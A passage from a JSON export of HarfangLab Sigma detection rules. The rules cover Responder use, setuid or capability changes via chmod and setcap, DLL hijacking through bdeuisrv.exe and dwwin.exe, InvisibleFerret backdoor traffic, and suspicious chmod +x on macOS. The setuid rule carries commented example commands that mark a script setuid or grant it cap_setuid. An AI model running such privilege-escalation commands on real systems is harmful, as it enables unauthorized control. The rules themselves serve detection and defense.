"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "058378a0-6b19-4ce5-86a4-9bd8a453e8ad",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619415Z",
"creation_date": "2026-03-23T11:45:34.619416Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619421Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/SpiderLabs/Responder",
"https://github.com/lgandx/Responder",
"https://attack.mitre.org/software/S0174/"
],
"name": "t1557_001_responder_usage.yml",
"content": "title: Responder Executed\nid: 058378a0-6b19-4ce5-86a4-9bd8a453e8ad\ndescription: |\n Detects Responder, an open source tool used for poisoning LLMNR, NBT-NS, and mDNS queries, selectively responding based on query types, primarily targeting SMB services.\n Attackers can use this tool for credential access, privilege escalation and lateral movement.\n It is recommended to verify if the usage of this tool is legitimate.\nreferences:\n - https://github.com/SpiderLabs/Responder\n - https://github.com/lgandx/Responder\n - https://attack.mitre.org/software/S0174/\ndate: 2024/09/26\nmodified: 2025/02/05\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.collection\n - attack.t1557.001\n - attack.discovery\n - attack.t1040\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.HackTool.Responder\n - classification.Linux.Behavior.NetworkActivity\n - classification.Linux.Behavior.CredentialAccess\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n CommandLine: 'sh -c */certs/gen-self-signed-cert.sh >/dev/null 2>&1'\n\n condition: selection\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "058378a0-6b19-4ce5-86a4-9bd8a453e8ad",
"rule_name": "Responder Executed",
"rule_description": "Detects Responder, an open source tool used for poisoning LLMNR, NBT-NS, and mDNS queries, selectively responding based on query types, primarily targeting SMB services.\nAttackers can use this tool for credential access, privilege escalation and lateral movement.\nIt is recommended to verify if the usage of this tool is legitimate.\n",
"rule_creation_date": "2024-09-26",
"rule_modified_date": "2025-02-05",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.credential_access",
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1040",
"attack.t1557.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "058b2e5d-6e8a-4289-bfb7-96a9cc306c0f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.594725Z",
"creation_date": "2026-03-23T11:45:34.623356Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.623360Z",
"rule_level": "high",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md",
"https://attack.mitre.org/techniques/T1548/001/"
],
"name": "t1548_001_chmod_setuid_linux.yml",
"content": "title: SetUID Access Flag Set via chmod/setcap\nid: 058b2e5d-6e8a-4289-bfb7-96a9cc306c0f\ndescription: |\n Detects when chmod or setcap are used to set the SetUID bit or capability on a file.\n This could be used by an attacker to execute a file with a different (and potentially more privileged) user context.\n It is recommended to analyze the targeted binary as well as the process responsible for the setting change and look for privilege escalation and malicious binaries.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md\n - https://attack.mitre.org/techniques/T1548/001/\ndate: 2022/09/26\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.defense_evasion\n - attack.t1548.001\n - attack.t1222.002\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.LOLBin.Chmod\n - classification.Linux.Behavior.ConfigChange\n - classification.Linux.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_chmod:\n # chmod +s /home/user/malicious_script.sh\n # chmod ug+s /home/user/malicious_script.sh\n # chmod u+s /home/user/malicious_script.sh\n # chmod 2644 /home/user/malicious_script.sh\n # chmod 6644 /home/user/malicious_script.sh\n Image|endswith: '/chmod'\n CommandLine|contains:\n - ' +s'\n - 'ug+s'\n - 'u+s'\n - ' 4??? '\n - ' 6??? '\n ParentImage|contains: '?'\n\n selection_setcap:\n # setcap cap_setuid=pe /home/user/malicious_script.sh\n # setcap cap_setuid=e /home/user/malicious_script.sh\n # setcap cap_setuid=+pie /home/user/malicious_script.sh\n # setcap cap_net_bind_service,cap_setuid=pe /home/user/malicious_script.sh\n # setcap cap_setuid,cap_setgid=+pie /home/user/malicious_script.sh\n Image|endswith: '/setcap'\n CommandLine|contains: 'cap_setuid'\n ParentImage|contains: '?'\n\n exclusion_octal:\n CommandLine|startswith: 'chmod ??? /'\n\n exclusion_dpkg:\n - ParentImage: '/usr/bin/dpkg'\n - GrandparentImage: '/usr/bin/dpkg'\n - ProcessAncestors|contains: '|/usr/bin/dpkg|'\n\n exclusion_suexec:\n CommandLine: 'chmod 4510 /usr/sbin/suexec'\n ParentCommandLine: '/bin/bash /usr/lib64/plesk-?.?/install_suexec'\n\n exclusion_virtualbox:\n CommandLine:\n - 'chmod 4511 /usr/lib/virtualbox/VBoxVolInfo'\n - 'chmod 4511 /usr/lib/virtualbox/VBoxNetAdpCtl'\n - 'chmod 4511 /usr/lib/virtualbox/VBoxNetNAT'\n - 'chmod 4511 /usr/lib/virtualbox/VBoxNetDHCP'\n - 'chmod 4511 /usr/lib/virtualbox/VBoxHeadless'\n - 'chmod 4511 /usr/lib/virtualbox/VirtualBoxVM'\n ParentCommandLine: '/bin/sh /var/lib/dpkg/info/virtualbox-*.postinst configure*'\n\n exclusion_yocto_sdk:\n # chmod o-x,u+s /opt/yocto/yocto-new/build/...\n # chmod 4755 /opt/yocto/kirkstone/build..\n # chmod 4111 /opt/yocto/yocto-new/build/tmp...\n CommandLine: 'chmod * /opt/yocto/*'\n\n exclusion_vtom:\n CommandLine:\n - 'chmod 4755 /opt/vtom/manager/bin/vtmanager'\n - 'chmod 4755 /opt/vtom/abm/bin/bdaemon'\n\n exclusion_isa:\n ParentCommandLine: '/bin/bash /etc/init.d/isa status'\n\n exclusion_bitdefender:\n # /bin/sh /var/lib/dpkg/info/bitdefender-security-tools.postinst configure 7.0.5-200090\n CommandLine: 'chmod +s /opt/bitdefender-security-tools/bin/auctl'\n ParentCommandLine|startswith: '/bin/sh /var/lib/dpkg/info/bitdefender-security-tools.postinst configure'\n\n exclusion_nxserver:\n CommandLine|contains:\n - ' /etc/nx/nxserver'\n - ' /usr/nx/scripts'\n ParentCommandLine|startswith:\n - '/bin/bash /usr/nx/scripts/setup/nxserver'\n - '/usr/bin/bash /usr/nx/scripts/setup/nxserver'\n - '/bin/bash /usr/nx/scripts/setup/nxnode'\n - '/usr/bin/bash /usr/nx/scripts/setup/nxnode'\n - '/bin/bash /usr/nx/scripts/setup/nxrunner'\n - '/usr/bin/bash /usr/nx/scripts/setup/nxrunner'\n\n exclusion_apt:\n GrandparentImage:\n - '/usr/bin/apt-get'\n - '/usr/bin/apt'\n\n exclusion_dnf:\n - GrandparentImage: '/usr/bin/dnf5'\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf-automatic'\n\n exclusion_rpm:\n ProcessAncestors|contains: '|/usr/bin/rpm|'\n\n exclusion_netdata:\n - GrandparentCommandLine: '/bin/sh /etc/cron.daily/netdata-updater'\n - CommandLine|startswith: 'chmod 4750 usr/libexec/netdata/plugins.d/'\n ParentCommandLine|startswith: './bin/bash system/install-or-update.sh '\n\n exclusion_yum:\n GrandparentCommandLine|startswith: '/usr/bin/python /bin/yum '\n\n exclusion_make:\n - ParentImage: '/usr/bin/make'\n - GrandparentImage: '/usr/bin/make'\n\n exclusion_sap:\n CommandLine: 'chmod * /usr/sap/*/exe/*'\n ParentCommandLine|startswith:\n - '/bin/sh ./oraroot.sh '\n - '/bin/sh ./saproot.sh '\n\n exclusion_oracle:\n CommandLine|contains:\n - 'chmod * /u01/app/oracle/'\n - 'chmod ???? /oracle/'\n - 'chmod ???? /exec/oracle/product/'\n - 'chmod ???? /usr/lib/oracle/agent/'\n - 'chmod ???? /opt/ORCLfmap/'\n - 'chmod ???? /opt/oracle/'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_cloudera:\n ParentCommandLine|startswith:\n - '/usr/bin/python?.? /opt/cloudera'\n - '/usr/bin/python?.?? /opt/cloudera'\n\n exclusion_oneautomation:\n ProcessCommandLine: 'chmod 4755 /opt/oneautomation/*/agent/bin/ucxj*'\n\n exclusion_docker:\n ProcessAncestors|contains:\n - '|/usr/bin/containerd-shim-runc-v2|'\n - '|/usr/bin/runc|/usr/bin/dockerd|'\n - '|/usr/sbin/runc|/usr/bin/dockerd|'\n - '|/usr/bin/podman|'\n\n exclusion_ancestors:\n ProcessAncestors|contains:\n - '|/opt/copiloteagent/copiloteagent|'\n - '|/usr/NX/bin/nxpost|'\n\n condition: 1 of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "058b2e5d-6e8a-4289-bfb7-96a9cc306c0f",
"rule_name": "SetUID Access Flag Set via chmod/setcap",
"rule_description": "Detects when chmod or setcap are used to set the SetUID bit or capability on a file.\nThis could be used by an attacker to execute a file with a different (and potentially more privileged) user context.\nIt is recommended to analyze the targeted binary as well as the process responsible for the setting change and look for privilege escalation and malicious binaries.\n",
"rule_creation_date": "2022-09-26",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1222.002",
"attack.t1548.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "059bfeb6-d7ab-49e8-995d-d3c4bca73b53",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.592167Z",
"creation_date": "2026-03-23T11:45:34.592171Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.592179Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_bdeuisrv.yml",
"content": "title: DLL Hijacking via bdeuisrv.exe\nid: 059bfeb6-d7ab-49e8-995d-d3c4bca73b53\ndescription: |\n Detects potential Windows DLL Hijacking via bdeuisrv.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'bdeuisrv.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\USERENV.dll'\n - '\\WTSAPI32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "059bfeb6-d7ab-49e8-995d-d3c4bca73b53",
"rule_name": "DLL Hijacking via bdeuisrv.exe",
"rule_description": "Detects potential Windows DLL Hijacking via bdeuisrv.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "059d6ada-8f39-4f7f-a79a-a0e3ef21e910",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.587052Z",
"creation_date": "2026-03-23T11:45:34.587056Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.587064Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dwwin.yml",
"content": "title: DLL Hijacking via dwwin.exe\nid: 059d6ada-8f39-4f7f-a79a-a0e3ef21e910\ndescription: |\n Detects potential Windows DLL Hijacking via dwwin.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dwwin.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\wer.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "059d6ada-8f39-4f7f-a79a-a0e3ef21e910",
"rule_name": "DLL Hijacking via dwwin.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dwwin.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "05b15125-dd13-43a6-aa65-67a40e6b9fc1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619386Z",
"creation_date": "2026-03-23T11:45:34.619388Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619392Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://unit42.paloaltonetworks.com/two-campaigns-by-north-korea-bad-actors-target-job-hunters/",
"https://objective-see.org/blog/blog_0x7A.html",
"https://www.group-ib.com/blog/apt-lazarus-python-scripts/",
"https://attack.mitre.org/techniques/T1555/003/"
],
"name": "t1555_003_invisibleferret_backdoor_linux.yml",
"content": "title: InvisibleFerret Backdoor Communication Detected (Linux)\nid: 05b15125-dd13-43a6-aa65-67a40e6b9fc1\ndescription: |\n Detects network communications related to the InvisibleFerret backdoor.\n InvisibleFerret is a cross-platform backdoor written in Python. The development and usage of this tool has been attributed to Lazarus Group (also known as APT38 or DPRK), a North Korean state-sponsored cyber threat group.\n InvisibleFerret consists of various components that target popular web browsers on Windows, Linux and macOS to steal login credentials and other sensitive data.\n It is recommended to investigate the process performing this action and the destination IP address to determine the legitimacy of this behavior.\nreferences:\n - https://unit42.paloaltonetworks.com/two-campaigns-by-north-korea-bad-actors-target-job-hunters/\n - https://objective-see.org/blog/blog_0x7A.html\n - https://www.group-ib.com/blog/apt-lazarus-python-scripts/\n - https://attack.mitre.org/techniques/T1555/003/\ndate: 2024/10/25\nmodified: 2025/02/14\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.credential_access\n - attack.t1056.001\n - attack.t1555.003\n - attack.command_and_control\n - attack.t1571\n - attack.exfiltration\n - attack.t1041\n - classification.Linux.Source.NetworkActivity\n - classification.Linux.ThreatActor.Lazarus\n - classification.Linux.ThreatActor.DPRK\n - classification.Linux.Malware.InvisibleFerret\n - classification.Linux.Behavior.CredentialAccess\n - classification.Linux.Behavior.SensitiveInformation\nlogsource:\n category: network_connection\n product: linux\ndetection:\n selection:\n ProcessCommandLine: 'python* /home/*/.npl'\n ProcessGrandparentImage: '/node'\n DestinationPort:\n - '1224'\n - '2245'\n\n condition: selection\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "05b15125-dd13-43a6-aa65-67a40e6b9fc1",
"rule_name": "InvisibleFerret Backdoor Communication Detected (Linux)",
"rule_description": "Detects network communications related to the InvisibleFerret backdoor.\nInvisibleFerret is a cross-platform backdoor written in Python. The development and usage of this tool has been attributed to Lazarus Group (also known as APT38 or DPRK), a North Korean state-sponsored cyber threat group.\nInvisibleFerret consists of various components that target popular web browsers on Windows, Linux and macOS to steal login credentials and other sensitive data.\nIt is recommended to investigate the process performing this action and the destination IP address to determine the legitimacy of this behavior.\n",
"rule_creation_date": "2024-10-25",
"rule_modified_date": "2025-02-14",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.command_and_control",
"attack.credential_access",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1041",
"attack.t1056.001",
"attack.t1555.003",
"attack.t1571"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "05e6ac9c-7eac-44f4-a137-10196a85ae1b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.608259Z",
"creation_date": "2026-03-23T11:45:34.608263Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.608270Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1222/002/"
],
"name": "t1222_002_binary_chmodx_susp_directory.yml",
"content": "title: Suspicious Binary Made Executable\nid: 05e6ac9c-7eac-44f4-a137-10196a85ae1b\ndescription: |\n Detects an attributes change on a file to make it executable in an uncommon directory.\n Adversaries may set the execute bit on a file before executing it.\n Is it recommended to check the harmlessness of the new executable file and for other suspicious behavior from the process modifying the file.\nreferences:\n - https://attack.mitre.org/techniques/T1222/002/\ndate: 2024/07/30\nmodified: 2025/11/17\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.002\n - attack.defense_evasion\n - attack.t1222.002\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.DefenseEvasion\nlogsource:\n product: macos\n category: filesystem_event\ndetection:\n selection:\n Kind: 'chmod'\n PrettyMode|contains: 'x'\n Image|endswith: '/chmod'\n\n selection_path:\n Path|startswith:\n - '/users/shared/'\n - '/private/tmp/'\n - '/private/var/tmp/'\n - '/private/etc/'\n - '/private/var/root/'\n - '/Volumes/'\n\n selection_ancestors:\n ProcessAncestors|contains:\n - '/users/shared/'\n - '/private/tmp/'\n - '/private/var/tmp/'\n - '/private/etc/'\n - '/private/var/root/'\n - '/Volumes/'\n\n exclusion_unix:\n Path: '/private/tmp/.*-unix'\n\n exclusion_adobe:\n Path: '/private/tmp/com.adobe.acrobat.DC/acrobat.plist'\n ProcessCommandLine: '/bin/chmod -R 777 /tmp/com.adobe.acrobat.DC'\n\n exclusion_adobe_updater:\n - Path: '/private/tmp/com.adobe.acrobat.updater'\n ProcessCommandLine: 'chmod o+w /tmp/com.adobe.acrobat.updater'\n - Path: '/private/tmp/com.adobe.AcrobatRefreshManager'\n ProcessCommandLine: 'chmod go= /tmp/com.adobe.AcrobatRefreshManager'\n\n exclusion_ansible:\n Path: '/private/tmp/ansible-tmp-*'\n ProcessCommandLine|startswith: 'chmod u+x /tmp/ansible-tmp-'\n\n exclusion_installer:\n ProcessParentCommandLine|startswith:\n - '/bin/sh /tmp/PKInstallSandbox.??????/'\n - '/bin/bash /tmp/pkinstallsandbox.??????/'\n ProcessGrandparentCommandLine|startswith:\n - '/bin/sh /tmp/PKInstallSandbox.??????/'\n - '/bin/bash /tmp/pkinstallsandbox.??????/'\n\n exclusion_dotnet:\n ProcessParentCommandLine|contains|all:\n - 'dotnet'\n - 'install'\n\n exclusion_jamf:\n - Path: '/Users/Shared/jamfdata'\n ProcessCommandLine: 'chmod -R o-w /System/Volumes/Data/Users/Shared'\n - ProcessParentCommandLine|startswith: '/bin/bash /library/application support/jamf/'\n\n exclusion_maxon:\n Path|startswith:\n - '/Users/Shared/Maxon'\n - '/Users/Shared/Red Giant'\n ProcessCommandLine|startswith:\n - 'chmod -R a+w /Users/Shared/Maxon'\n - 'chmod -R a+w /Users/Shared/Red Giant'\n\n exclusion_tunnelblick:\n Path: '/private/var/root/Library/Application Support/Tunnelblick'\n\n exclusion_common_folders:\n - ProcessParentImage|startswith:\n - '/Applications/'\n - '/Library/'\n - '/Users/*/Applications/'\n - '/Users/*/Library/'\n - ProcessGrandparentImage|startswith:\n - '/Applications/'\n - '/Library/'\n - '/Users/*/Applications/'\n - '/Users/*/Library/'\n\n exclusion_cisco:\n ProcessParentCommandLine|startswith:\n - '/bin/bash /opt/cisco/secureclient/temp/downloader/vpndownloader.sh'\n - '/bin/bash 